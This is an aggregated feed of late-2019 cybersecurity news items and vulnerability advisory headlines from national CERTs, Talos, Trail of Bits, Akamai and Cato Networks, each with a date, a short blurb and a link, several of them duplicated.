How can individual Autoreporter observations help track globally significant malware? We have previously released information on how QSnatch works and how users can clean infected devices. Now we will tell you how we first detected the malware. QSnatch has attracted attention from Europe to Asia: at least 100,000 QSnatch infections have been detected across the world.

https://www.kyberturvallisuuskeskus.fi/en/news/spike-malware-observations-helped-find-over-100000-devices-infected-qsnatch-across-world
Security Alert (A19-12-02): Vulnerability in VMware Products
2019-12-09T04:00:00Z | 1575864000

VMware has published a security advisory to address a remote code execution vulnerability in OpenSLP that was used in VMware ESXi and Horizon Desktop-as-a-service (DaaS) appliance.

https://www.govcert.gov.hk/en/alerts_detail.php
Guardicore Centra Integration now available on CyberArk Marketplace
2019-12-08T14:24:00Z | 1575815040

Privileged Access Management is part of a zero-trust model. Guardicore strengthens its offering by integrating with CyberArk.

https://www.akamai.com/blog/security/guardicore-integrates-with-cyberark-for-privileged-access-management
Managing Traffic From the Outset: How GTM Can Make Your Deployments Easier
2019-12-05T05:00:00Z | 1575522000

Global Traffic Management, or GTM, is a DNS-based load balancing service that offers application owners a level of flexibility and insight that is unmatched by traditional on-prem solutions.

https://www.akamai.com/blog/performance/managing-traffic-from-the-outset-how-gtm-can-make-your-deploymets
AMD ATI Radeon ATIDXX64.DLL shader functionality sincos denial-of-service vulnerability
2019-12-05T00:00:00Z | 1575504000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0890
Security Alert (A19-12-01): Multiple Vulnerabilities in Firefox
2019-12-04T04:00:00Z | 1575432000

Mozilla has published two security advisories (MFSA 2019-36 and MFSA 2019-37) to address multiple browser vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
What are VPN Tunnels and How do They Work
2019-12-03T12:59:33Z | 1575377973

Virtual Private Networks (VPNs) have become one of the cornerstones of secure communications over the internet. However, there has been a lot of confusion around what VPNs can and cannot do. That confusion has led many technologists to choose a VPN solution that may not be well suited for their particular environment. However, that confusion... The post What are VPN Tunnels and How do They Work appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-are-vpn-tunnels-and-how-do-they-work/
Shadowsocks-libev ss-server UdpRelay Denial-of-Service Vulnerability
2019-12-03T00:00:00Z | 1575331200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0956
Shadowsocks-libev ss-server Stream Cipher Information Disclosure Vulnerability
2019-12-03T00:00:00Z | 1575331200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0942
Shadowsocks-libev ss-manager add_server Code Execution Vulnerability
2019-12-03T00:00:00Z | 1575331200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0958
How to make an emergency call without network coverage
2019-12-02T14:21:51Z | 1575296511

You can always make an emergency call even in the event of disturbances in your operator’s network during power blackouts, for example. In certain rare cases, it may be possible that even emergency calls cannot be connected. Even then, you can always make an emergency call by switching off your mobile phone, switching it back on and making the emergency call when your phone asks for a lock or PIN code.

https://www.kyberturvallisuuskeskus.fi/en/news/how-make-emergency-call-without-network-coverage
How to make an emergency call without network coverage
2019-12-02T14:21:51Z | 1575296511

You can always make an emergency call even in the event of disturbances in your operator’s network during power blackouts, for example. In certain rare cases, it may be possible that even emergency calls cannot be connected. Even then, you can always make an emergency call by switching off your mobile phone, switching it back on and making the emergency call when your phone asks for a lock or PIN code.

https://www.kyberturvallisuuskeskus.fi/en/news/how-make-emergency-call-without-network-coverage
Accusoft ImageGear TIFF TIF_decode_thunderscan code execution vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0875
EmbedThis GoAhead web server code execution vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888
Accusoft ImageGear PNG IHDR width code execution vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0865
Accusoft ImageGear GEM Raster Code Execution Vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0921
Forma LMS 2.2.1 /appLms/ajax.server.php filter_cat and filter_status parameters SQL injections
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0904
EmbedThis GoAhead web server denial-of-service vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0889
Accusoft ImageGear BMP code execution vulnerability
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0922
Forma LMS 2.2.1 ajax.adm_server.php dir parameter SQL injections
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0902
Forma LMS 2.2.1 /appCore/index.php users parameter SQL injections
2019-12-02T00:00:00Z | 1575244800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0903
Petturite õngitsuslehed on muutumas inimeste jaoks usutavamaks
2019-11-29T14:41:19Z | 1575038479

Täna hommikul levisid järjekordsed petukirjad, mis viisid kasutaja näiliselt panga lehele, mille abil üritasid kurjategijad inimestelt raha välja petta. Uue võttena kuvatakse ohvrile pärast kasutajatunnuse sisestamist õngitsuslehel ka õige kontrollkood.

https://ria.ee/uudised/petturite-ongitsuslehed-muutumas-inimeste-jaoks-usutavamaks
Problems with disk systems caused data loss
2019-11-29T08:23:36Z | 1575015816

In recent weeks, the NCSC-FI has become aware of several IT system malfunctions that have resulted in the loss of data despite the fault tolerance (RAID) of the disk system.

https://www.kyberturvallisuuskeskus.fi/en/news/problems-disk-systems-caused-data-loss
Problems with disk systems caused data loss
2019-11-29T08:23:36Z | 1575015816

In recent weeks, the NCSC-FI has become aware of several IT system malfunctions that have resulted in the loss of data despite the fault tolerance (RAID) of the disk system.

https://www.kyberturvallisuuskeskus.fi/en/news/problems-disk-systems-caused-data-loss
Shop with common sense – Black Friday also means business for crooks
2019-11-29T08:21:21Z | 1575015681

The global sales day Black Friday attracts customers with major discounts. However, high customer volumes also attract criminals. Keep a cool head when making purchase decisions and make sure you are shopping on a safe website.

https://www.kyberturvallisuuskeskus.fi/en/news/shop-common-sense-black-friday-also-means-business-crooks
Shop with common sense – Black Friday also means business for crooks
2019-11-29T08:21:21Z | 1575015681

The global sales day Black Friday attracts customers with major discounts. However, high customer volumes also attract criminals. Keep a cool head when making purchase decisions and make sure you are shopping on a safe website.

https://www.kyberturvallisuuskeskus.fi/en/news/shop-common-sense-black-friday-also-means-business-crooks
Traficom participates in creating Spoofy, a children’s cyber skills game
2019-11-29T08:18:20Z | 1575015500

The game is a fun way for children to learn the basics in digital security.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-participates-creating-spoofy-childrens-cyber-skills-game
Traficom participates in creating Spoofy, a children’s cyber skills game
2019-11-29T08:18:20Z | 1575015500

The game is a fun way for children to learn the basics in digital security.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-participates-creating-spoofy-childrens-cyber-skills-game
64 Bits ought to be enough for anybody!
2019-11-27T11:01:30Z | 1574852490

How quickly can we use brute force to guess a 64-bit number? The short answer is, it all depends on what resources are available. So we’re going to examine this problem starting with the most naive approach and then expand to other techniques involving parallelization. We’ll discuss parallelization at the CPU level with SIMD instructions, […]

https://blog.trailofbits.com/2019/11/27/64-bits-ought-to-be-enough-for-anybody/
SD-WAN Confessions: How One Company Migrated from MPLS to SD-WAN
2019-11-26T14:48:31Z | 1574779711

Nick Dell is an IT manager who recently led a network transformation initiative at his company, moving from MPLS to SD-WAN. Dell shared why he made that transition and the lessons he learned along the way in the webinar SD-WAN Confessions: How I migrated from MPLS to SD-WAN. We’ve also summarized his experiences here. The... The post SD-WAN Confessions: How One Company Migrated from MPLS to SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-confessions-how-one-company-migrated-from-mpls-to-sd-wan/
Finland becomes the first European country to certify safe smart devices – new Cybersecurity label helps consumers buy safer products
2019-11-26T12:13:04Z | 1574770384

The Finnish Transport and Communications Agency Traficom has today launched a Cybersecurity label. The label guarantees to consumers that the labelled devices have basic information security features. The Cybersecurity label can be awarded to networking smart devices if the devices meet the certification criteria, which are based on EN 303 645. With the label, Traficom aims to raise consumer awareness of information security and the safe use of connected devices.

https://www.kyberturvallisuuskeskus.fi/en/news/finland-becomes-first-european-country-certify-safe-smart-devices-new-cybersecurity-label
Finland becomes the first European country to certify safe smart devices – new Cybersecurity label helps consumers buy safer products
2019-11-26T12:13:04Z | 1574770384

The Finnish Transport and Communications Agency Traficom has today launched a Cybersecurity label. The label guarantees to consumers that the labelled devices have basic information security features. The Cybersecurity label can be awarded to networking smart devices if the devices meet the certification criteria, which are based on EN 303 645. With the label, Traficom aims to raise consumer awareness of information security and the safe use of connected devices.

https://www.kyberturvallisuuskeskus.fi/en/news/finland-becomes-first-european-country-certify-safe-smart-devices-new-cybersecurity-label
High Threat Security Alert (A19-11-04): Vulnerability in Apache Solr Search Platform
2019-11-26T04:00:00Z | 1574740800

The Apache Software Foundation has released a security advisory to address an insecure setting issue in Apache Solr 8.1.1 and 8.2.0 for Linux.

https://www.govcert.gov.hk/en/alerts_detail.php
Divulgado estudo realizado pela AP2SI com o apoio do Observatório de Cibersegurança do CNCS
2019-11-25T00:00:00Z | 1574640000

Os resultados preliminares do estudo já se encontram disponíveis para consulta aqui , sendo que o estudo contou com um total de 367 respostas consideradas válidas por parte dos inquiridos num inquérito em linha, aberto e anónimo. As perguntas colocadas tiveram como objetivo conseguir uma caraterização demográfica dos inquiridos reunindo dados, tais como: • género, idade, habilitações literárias e localização geográfica;• situação profissional passada e atual, nomeadamente sector em que desenvolve a atividade, dados de empregabilidade e rotatividade, tempo de carreira, exclusividade, rendimento auferido e função exercida;• fatores considerados importantes na execução da atividade profissional.No futuro, serão efetuadas atualizações da página com a apresentação destes resultados compostos.

https://dyn.cncs.gov.pt/pt/detalhe/art/561/divulgado-estudo-realizado-pela-ap2si-com-o-apoio-do-observatorio-de-ciberseguranca-do-cncs
A Channel Program with Some Sass for Partners to Win in the SASE Era
2019-11-24T10:36:29Z | 1574591789

Today, we announced a new kind of partner program, one that’s been designed from the ground up to meet the needs of today’s channel. It is also the first partner program that enables MSPs and resellers to position Secure Access Service Edge (SASE, pronounced “sassy”) as a converged, future-proof, global, network and security cloud service.... The post A Channel Program with Some Sass for Partners to Win in the SASE Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-channel-program-with-some-sass-for-partners-to-win-in-the-sase-era/
Akamai Foundation and Social Responsibility
2019-11-22T05:00:00Z | 1574398800

Recently, at Akamai, we launched the Akamai Foundation, to continue to reach a broader, more diverse range of young people with quality Science, Technology, Engineering and Math (STEM) education. We believe that this work is a vital part of securing...

https://www.akamai.com/blog/culture/akamai-foundation-and-social-responsibility
Security Alert (A19-11-03): Vulnerability in ISC BIND
2019-11-21T04:00:00Z | 1574308800

A vulnerability in the ISC BIND software could make it fail to effectively limit the number of concurrent TCP clients for avoiding resource overloading.

https://www.govcert.gov.hk/en/alerts_detail.php
xcftools flattenIncrementally tiles walk code execution vulnerability
2019-11-21T00:00:00Z | 1574294400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0878
Tenda AC9 /goform/WanParameterSetting Command Injection Vulnerability
2019-11-21T00:00:00Z | 1574294400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0861
Rotid põhjustasid riigivõrgu osalise katkestuse
2019-11-20T18:30:28Z | 1574274628

Täna kella 16.30 ajal sai Riigi Infosüsteemi Amet (RIA) teada, et Harjumaal paikneva maa-aluse riigivõrgu kaabli töös on häired. Kohapeal selgus, et rotid olid kaablit tugevalt kahjustanud.

https://ria.ee/uudised/rotid-pohjustasid-riigivorgu-osalise-katkestuse
How to Identify Malicious Bots on your Network in 5 Steps
2019-11-20T14:19:54Z | 1574259594

It’s no secret that malicious bots play a crucial role in the security breaches of enterprise networks. Bots are often used by malware for propagation across the enterprise network. But identifying and removing malicious bots has been complicated by the fact that many routine processes in an operating environment, such as the software updaters, are... The post How to Identify Malicious Bots on your Network in 5 Steps appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-identify-malicious-bots-on-your-network-in-5-steps/
October cyber weather grey and rainy
2019-11-20T11:21:42Z | 1574248902

Cyber weather in October was overall rainy. The number of data breaches involving credential phishing continued to grow, and incidents of malware spread by email doubled compared to September. On a positive note, the European Cybersecurity Month, an annual EU awareness campaign, brought spells of clear weather by giving advice on how to improve everyday cybersecurity skills.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/2019-lokakuun-kybersaa
October cyber weather grey and rainy
2019-11-20T11:21:42Z | 1574248902

Cyber weather in October was overall rainy. The number of data breaches involving credential phishing continued to grow, and incidents of malware spread by email doubled compared to September. On a positive note, the European Cybersecurity Month, an annual EU awareness campaign, brought spells of clear weather by giving advice on how to improve everyday cybersecurity skills.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/2019-lokakuun-kybersaa
xcftools flattenIncrementally rows allocation code execution vulnerability
2019-11-20T00:00:00Z | 1574208000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0879
Why is SD-WAN Considered a Top Choice Among VPN Alternatives?
2019-11-19T15:54:35Z | 1574178875

AdRoll’s Global Director of IT Adrian Dunne faced several challenges when attempting to scale the company’s Internet-based VPNs. Network performance, security, and redundancy all became major issues as AdRoll grew, prompting Dunne to search for a VPN alternative. What struck me most about AdRoll’s use case was that it was a microcosm for the issues... The post Why is SD-WAN Considered a Top Choice Among VPN Alternatives? appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-is-sd-wan-considered-a-top-choice-among-vpn-alternatives/
What is Network Visibility?
2019-11-19T11:23:19Z | 1574162599

When I read that less than 20% of IT professionals indicated their organizations can properly monitor public cloud infrastructure, it reminded me of the reoccurring network visibility conversations I have with network managers from around the globe. The dynamic and distributed nature of cloud workloads coupled with a mobile workforce make avoiding shadow IT and... The post What is Network Visibility? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-network-visibility/
„Ole IT-vaatlik!“ kutsub inimesi 20. novembril üle Eesti raamatukogudesse kübernõu küsima
2019-11-18T08:06:17Z | 1574064377

Eesti Raamatukoguhoidjate Ühing korraldab koostöös Riigi Infosüsteemi Ametiga 20. novembril „IT-vaatlik“ nõuandepäeva, kus ligi 90 raamatukogu üle Eesti pakuvad eelkõige vanemaealistele internetikasutajatele mõeldes abi küberturvalisuse küsimustes.

https://ria.ee/uudised/ole-it-vaatlik-kutsub-inimesi-20-novembril-ule-eesti-raamatukogudesse-kubernou-kusima
Fake Cozy Bear Group Making DDoS Extortion Demands
2019-11-15T05:00:00Z | 1573794000

A group calling themselves "Cozy Bear" has been emailing various companies with an extortion letter, demanding payment and threatening targeted DDoS attacks if their demands are not met....

https://www.akamai.com/blog/security/fake-cozy-bear-group-making-ddos-extortion-demands
In Conversation: Successful Women
2019-11-15T05:00:00Z | 1573794000

Success is a tricky word to define. It means something different to everyone and can only be measured by an individual themselves. Often, success is seen as being about what an individual achieves, rather than about who they grow to...

https://www.akamai.com/blog/culture/in-conversation-successful-women
OpenWrt ustream-ssl certificate verification information leak vulnerability
2019-11-15T00:00:00Z | 1573776000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0893
Introducing iVerify, the security toolkit for iPhone users
2019-11-14T14:38:48Z | 1573742328

“If privacy matters, it should matter to the phone your life is on.” So says Apple in their recent ads about Privacy on the iPhone and controlling the data you share—but many of the security features they highlight are opt-in, and users often don’t know when or how to activate them. But hey… we got […]

https://blog.trailofbits.com/2019/11/14/introducing-iverify-the-security-toolkit-for-iphone-users/
Announcing the Crytic $10k Research Prize
2019-11-13T12:00:35Z | 1573646435

At Trail of Bits, we make a significant effort to stay up to date with the academic world. We frequently evaluate our work through peer-reviewed conferences, and we love to attend academic events (see our recent ICSE and Crypto recaps). However, we consistently see one recurring issue at these academic events: a lack of reliable […]

https://blog.trailofbits.com/2019/11/13/announcing-the-crytic-10k-research-prize/
High Threat Security Alert (A19-11-02): Multiple Vulnerabilities in Microsoft Products (November 2019)
2019-11-13T04:00:00Z | 1573617600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that active exploitation against the vulnerability in Microsoft Internet Explorer for remote code execution have been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Intel IGC64.DLL shader functionality DCL_INDEXABLE_TEMP denial-of-service vulnerability
2019-11-13T00:00:00Z | 1573603200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0845
Exhibitor UI command injection vulnerability
2019-11-13T00:00:00Z | 1573603200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0790
The Network for the Digital Business Starts with the Secure Access Service Edge
2019-11-12T11:07:39Z | 1573556859

The post The Network for the Digital Business Starts with the Secure Access Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/resources/what-is-secure-access-service-edge-sase/
Microsoft Office Excel WorksheetOptions Code Execution Vulnerability
2019-11-12T00:00:00Z | 1573516800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0886
Microsoft Media Foundation CMP4MetadataHandler AddQTMetadata Code Execution Vulnerability
2019-11-12T00:00:00Z | 1573516800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0912
Quadro Nacional de Referência em Cibersegurança permite às organizações reduzir o risco associado às ciberameaças
2019-11-12T00:00:00Z | 1573516800

Apesar da apresentação do documento ter tido lugar em junho (durante a conferência anual C-DAYS), num ambiente onde foi tratado a fundo o tema da economia digital e das ameaças e vulnerabilidades das organizações que englobam o ciberespaço, o documento conta agora com um novo layout que facilita a perceção e compreensão de todos os interessados.Neste sentido, o documento conta com um conjunto de recomendações para que as organizações possam definir uma estratégia que envolva toda a sua estrutura. De forma genérica, o QNRCS conta essencialmente com cinco objetivos: identificar, proteger, detetar, responder, recuperar.Recorde-se que as entidades podem aderir de forma voluntária, beneficiando assim de uma abordagem homogénea que promove uma resposta nacional às ciberameaças.Consulte aqui o documento.

https://dyn.cncs.gov.pt/pt/detalhe/art/560/quadro-nacional-de-referencia-em-ciberseguranca-permite-as-organizacoes-reduzir-o-risco-associado-as-ciberameacas
Fight Edge Vendor Sprawl
2019-11-11T14:36:27Z | 1573482987

One potential pain point in an SD-WAN deployment is vendor sprawl at the WAN edge: the continual addition of vendors to the portfolio IT has to manage to keep the edge functional and healthy. This sprawl comes in two forms: appliance vendors, and last-mile connectivity vendors. As noted in an earlier post, most folks deploying... The post Fight Edge Vendor Sprawl appeared first on Cato Networks.

https://www.catonetworks.com/blog/fight-edge-vendor-sprawl/
RIA sõlmis nägemispuudega inimestega hea tahte märgiks kompromissi
2019-11-11T14:33:23Z | 1573482803

Riigi Infosüsteemi Amet ei nõustunud juuli lõpus kohtusse pöördunud nägemispuudega inimeste mittevaralise nõudega, kuid pakkus hea tahte märgiks kompromissi.

https://ria.ee/uudised/ria-solmis-nagemispuudega-inimestega-hea-tahte-margiks-kompromissi
Everything You Ever Wanted To Know About Test-Case Reduction, But Didn’t Know to Ask
2019-11-11T12:00:11Z | 1573473611

Imagine reducing the amount of code and time needed to test software, while at the same time increasing the efficacy of your tests and making your debugging tasks easier—all with minimal human effort. It seems too good to be true, but we’re going to explain how test-case reduction can do all this (and maybe more). […]

https://blog.trailofbits.com/2019/11/11/test-case-reduction/
Security assessment techniques for Go projects
2019-11-07T12:00:06Z | 1573128006

The Trail of Bits Assurance practice has received an influx of Go projects, following the success of our Kubernetes assessment this summer. As a result, we’ve been adapting for Go projects some of the security assessment techniques and tactics we’ve used with other compiled languages. We started by understanding the design of the language, identifying […]

https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/
Phishing Detection via Analytic Networks
2019-11-06T05:00:00Z | 1573016400

As mentioned in previous Akamai blogs, phishing is an ecosystem of mostly framework developers and buyers who purchase kits to harvest credentials and other sensitive information. Like many framework developers, those focusing on phishing kits want to create an efficient...

https://www.akamai.com/blog/security/phishing-detection-via-analytic-networks
Sextortion Spam Scientifically Scrutinized
2019-11-05T12:26:44Z | 1572956804

Sextortion scams are one of the big newcomers in Internet fraud of the last year. In these campaigns spammers send e-mails which claim that they have hacked into the victim's computer and used its webcam to film the victim masturbating while surfing adult websites. In order to prevent the crooks from publishing the compromising material they demand a certain amount of money in bitcoin within a certain timeframe. Of course, these claims are largely false which is easy to see if you think about the amount of work and expertise it would take to break into millions of desktop computers, monitor the browsers for accessing porn websites, capturing "evidence", and looking through it to make sure it actually contains what the attackers want, etc. Nevertheless, these campaigns are pretty successful and a new research paper (see URL below) takes a scientific look into them. Some of the key takeaways are: Sextortion campaigns are much cheaper than traditional spam campaigns as there is no need to set up and maintain credible looking websites, purchase, sell and ship (poor quality) goods, etc. This may increase the profit for the criminals compared to "traditional" spam, although the authors' don't say anything about this.Cryptocurrencies make these campaigns much easier to pull of compared to using old-school money.In the examined campaigns the price for the ransom varies for different languages.A lot of the bitcoin addresses are shared throughout multiple campaigns and many can likely be tied to a single real-world entity, but this can be due to the infrastructure the spammers are using, not due to the small number of spammers themselves.This research proves with numbers what many people in (IT-)security experience everyday: If there is an easy, quick, and cheap way to earn money, most criminals will prefer it compared to more sophisticated methods. Research Paper: https://arxiv.org/abs/1908.01051

https://www.cert.at/en/blog/2019/8/sextortion-spam-scientifically-scrutinized
My First Job?Being Inspired and Having an Impact
2019-11-05T05:00:00Z | 1572930000

Written by Bridget Meuse, Product Marketing Specialist - Corporate Sustainability I've recently hit my four-month mark here at Akamai and it's been a whirlwind, to say the least. Despite having had two previous summer internships at Akamai, stepping into my...

https://www.akamai.com/blog/culture/my-first-job-being-inspired-and-having-an-impact
LEADTOOLS BMP Parsing Remote Code Execution Vulnerability
2019-11-05T00:00:00Z | 1572912000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0892
LEADTOOLS CMP-parsing code execution vulnerability
2019-11-05T00:00:00Z | 1572912000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0891
LEADTOOLS TIF ImageWidth code execution vulnerability
2019-11-05T00:00:00Z | 1572912000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0876
LEADTOOLS JPEG2000 j2pc Parsing Remote Code Execution Vulnerability
2019-11-05T00:00:00Z | 1572912000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0916
Tartu Ülikooli teadustöö: digiallkirja andmise määramine vajab Euroopas täpsustamist
2019-11-04T13:23:58Z | 1572873838

Tartu Ülikooli teadlased õigusteaduskonna IT-õiguse külalislektor, vandeadvokaat Tõnu Mets ja arvutiteaduse instituudi infoturbe töörühma juht Arnis Paršovs kirjutasid artikli „Allkirjastamise aeg Eesti digiallkirjades“.

https://ria.ee/uudised/tartu-ulikooli-teadustoo-digiallkirja-andmise-maaramine-vajab-euroopas-tapsustamist
Investintech Able2Extract Professional BMP decoding biClrUsed code execution vulnerability
2019-11-04T00:00:00Z | 1572825600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0880
Investintech Able2Extract professional JPEG decoding code execution vulnerability
2019-11-04T00:00:00Z | 1572825600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0881
Two New Tools that Tame the Treachery of Files
2019-11-01T11:00:18Z | 1572606018

Parsing is hard, even when a file format is well specified. But when the specification is ambiguous, it leads to unintended and strange parser and interpreter behaviors that make file formats susceptible to security vulnerabilities. What if we could automatically generate a “safe” subset of any file format, along with an associated, verified parser? That’s […]

https://blog.trailofbits.com/2019/11/01/two-new-tools-that-tame-the-treachery-of-files/
Beyond the Thin Branch: Move Network Functions to Cloud, Says Leading Analyst
2019-11-01T07:17:45Z | 1572592665

Retailers, financial services firms, and other kinds of companies want to become more agile in their branch strategies: be able to light up, move, and shut down branches quickly and easily. One sticking point has always been the branch network stack: deploying, configuring, managing, and retrieving the router, firewall, WAN optimizer, etc., as branches come... The post Beyond the Thin Branch: Move Network Functions to Cloud, Says Leading Analyst appeared first on Cato Networks.

https://www.catonetworks.com/blog/pursuing-the-zero-stack-solution-migrating-to-a-branch-stack-in-the-cloud/
High Threat Security Alert (A19-11-01): Multiple Vulnerabilities in Google Chrome
2019-11-01T04:00:00Z | 1572580800

Google released a security update to address use-after-free vulnerabilities in the PDFium and audio components of the Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty
2019-11-01T00:00:00Z | 1572566400

I was in San Francisco the few days leading up to me finding this bug with some friends. We’d spent the day hacking before a few of us were traveling to Vegas for DEF CON the next day. Some of them were going on a road trip and I decided to join them at the last minute, trading my seat for a travel voucher and leaving my checked baggage with all of my clothes behind. After buying some new clothes, we all met up the next morning at a nearby Starbucks to hack before we left.

https://samcurry.net/filling-in-the-blanks-exploiting-null-byte-buffer-overflow-for-a-40000-bounty
Destroying x86_64 instruction decoders with differential fuzzing
2019-10-31T11:00:01Z | 1572519601

TL;DR: x86_64 decoding is hard, and the number and variety of implementations available for it makes it uniquely suited to differential fuzzing. We’re open sourcing mishegos, a differential fuzzer for instruction decoders. You can use it to discover discrepancies in your own decoders and analysis tools! In the beginning, there was instruction decoding Decompilation and […]

https://blog.trailofbits.com/2019/10/31/destroying-x86_64-instruction-decoders-with-differential-fuzzing/
Já se encontra disponível o Roteiro para as Capacidades Mínimas em Cibersegurança
2019-10-31T00:00:00Z | 1572480000

Desta forma, o Centro Nacional de Cibersegurança (CNCS) definiu um modelo de capacitação em cibersegurança, que visa não só a melhoria de processos e pessoas, como também de tecnologias nas organizações nacionais, com especial enfoque nas PME (Pequenas e Médias Empresas).O Roteiro em causa apresenta um conjunto de ações que se dividem em cinco fases, sendo que estas foram pensadas para uma adaptação gradual, a implementar em cada organização, quer seja por meios próprios internos, ou mesmo recorrendo a subcontratação ou externalização de soluções. Neste sentido, é ainda de referir que este conjunto de atividades, enquadradas no âmbito do Quadro Nacional de Referência para a Cibersegurança, constituem o plasmar de uma capacidade mínima em cibersegurança, fornecendo assim às organizações visadas os instrumentos necessários para que estas possam fazer face às ameaças e perigos do Mundo Digital.Pode consultar aqui o respetivo documento.

https://dyn.cncs.gov.pt/pt/detalhe/art/559/ja-se-encontra-disponivel-o-roteiro-para-as-capacidades-minimas-em-ciberseguranca
With the Issues Packet Loss Can Create on the WAN, Mitigation is a Priority
2019-10-30T13:40:41Z | 1572442841

Network packets, the protocol data units (PDUs) of the network layer, are often taken for granted by network pros. We all get the concept: to transmit data over a TCP/IP network like the Internet requires the data be broken down into small packets (usually less than 1500 bytes) containing the relevant application data (“payload”) and... The post With the Issues Packet Loss Can Create on the WAN, Mitigation is a Priority appeared first on Cato Networks.

https://www.catonetworks.com/blog/with-the-issues-packet-loss-can-create-on-the-wan-mitigation-is-a-priority/
How safe browsing fails to protect user privacy
2019-10-30T11:00:57Z | 1572433257

Recently, security researchers discovered that Apple was sending safe browsing data to Tencent for all Chinese users. This revelation has brought the underlying security and privacy guarantees of the safe browsing protocol under increased scrutiny. In particular, safe browsing claims to protect users by providing them with something called k-anonymity. In this post we’ll show […]

https://blog.trailofbits.com/2019/10/30/how-safe-browsing-fails-to-protect-user-privacy/
Security Alert (A19-10-09): Multiple Vulnerabilities in Apple iOS and iPadOS
2019-10-30T04:00:00Z | 1572408000

Apple has released iOS 13.2 and iPadOS 13.2 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
YouPHPTube /objects/video.php getVideo videoName code execution vulnerability
2019-10-30T00:00:00Z | 1572393600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0941
YouPHPTube /objects/video.php getVideo search code execution vulnerability
2019-10-30T00:00:00Z | 1572393600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0940
Grace Hopper Celebration (GHC) 2019 Recap
2019-10-29T15:30:14Z | 1572363014

A few weeks ago I had the inspiring experience of attending the annual Grace Hopper Celebration (GHC), the world’s largest gathering of women in technology. Over four days in Orlando, Florida, GHC hosted a slew of workshops and presentations, plus a massive career fair with over […]

https://blog.trailofbits.com/2019/10/29/grace-hopper-celebration-2019/
FIRST shares 11 vital steps towards cyber security resilience in 2020
2019-10-29T12:00:00Z | 1572350400

October 9th, 2019 – As the year draws to a close, it is time for businesses across all industries and sectors to reflect and prepare for the upcoming new year. With this in mind, premier organization and recognized global leader in incident response - Forum of Incident Response and Security Teams (FIRST) has produced 11 vital steps that organizations should take to improve their incident response strategy.

https://www.first.org/newsroom/releases/20191009
High Threat Security Alert (A19-10-08): Vulnerability in NGINX with PHP Installation
2019-10-28T04:00:00Z | 1572235200

A vulnerability has been found in the PHP FastCGI Process Manager (PHP-FPM) for NGINX HTTP servers.

https://www.govcert.gov.hk/en/alerts_detail.php
VMware Fusion 11 Shader Functionality Denial Of Service
2019-10-28T00:00:00Z | 1572220800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0848
FIRST technical colloquium – Ljubljana 2019 – INFO GUIDE
2019-10-25T12:18:51Z | 1572005931

Ljubljana, November 13-14, 2019[1] EVENT VENUE The FIRST Technical Colloquium – Ljubljana will be held at the City Hotel in Ljubljana. (Hotel Address: City Hotel, Dalmatinova 15, 1000 Ljubljana) City … The post FIRST technical colloquium – Ljubljana 2019 – INFO GUIDE appeared first on SI CERT.

https://www.cert.si/en/first-technical-colloquium-ljubljana-2019-info-guide/
QSnatch - Malware designed for QNAP NAS devices
2019-10-25T11:05:38Z | 1572001538

In this article a malware dissected by the NCSC-FI specialists is visited upon. The malware is designed specifically for QNAP NAS (Network Attached Storage) devices, and it is capable of various malicious activities in an infected device. The malware can be removed from the device, and there is a firmware update from the manufacturer for further protection.

https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices
Formal Analysis of the CBC Casper Consensus Algorithm with TLA+
2019-10-25T11:00:56Z | 1572001256

